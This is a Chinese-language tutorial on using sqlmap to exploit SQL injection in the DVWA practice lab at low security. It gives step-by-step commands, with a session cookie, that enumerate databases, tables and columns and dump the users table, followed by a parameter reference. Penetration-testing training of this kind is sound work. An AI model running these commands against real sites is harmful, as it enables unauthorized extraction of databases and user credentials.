sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

靶机: dvwa 安全性设置为Low
Python: 2.7.14+

1.基础扫描

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#"

这里的url就是手动注入 1 后url栏的内容 直接扫描进行基础测试
期间会提示你是否插入cookie 这里选择否
1
扫描出了一些版本信息

2.加入cookie扫描

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62"

这里的 cookie信息需要手动去浏览器cookie处 复制 PHPSESSID这一项的值

返回基本信息

3.遍历数据库

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch --dbs

--batch参数 指选项选择默认项
--dbs 数据库

爆出数据库

4.指定数据库获取表名

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch -D dvwa --tables

-D参数 指定数据库
--tables 表名

爆出dvwa中的表的表名

5.获取所有数据库所有表名

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch --tables

表名

6.获取数据库中的列名

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch -D dvwa -T users --columns

-T指定列名
--columns 可以列出-D指定的库和-T指定的列中的所有列的名字和数据类型

列名

7.获取数据库内容

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch -D dvwa -T users --dump

数据库中表中内容

8.当前数据库

sqlmap -u "http://12.34.56.78/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7pcfia48bqo1tf10bd4tiegp62" --batch --current-db --dump

获取当前数据库名

参数

-batch  选项选择默认项
-a      遍历所有数据库
--current-db 获取当前数据库名
--dbs        获取所有数据库
--tables     获取所有数据库得表名
--columns    获取所有数据库的表和列名
-D           指定数据库
-T           指定表名
-C           指定列名
--dump       获取查询结果
--dump-all   获取整个数据库结果
--stop=x     x是一个整数,表示筛选结果多少条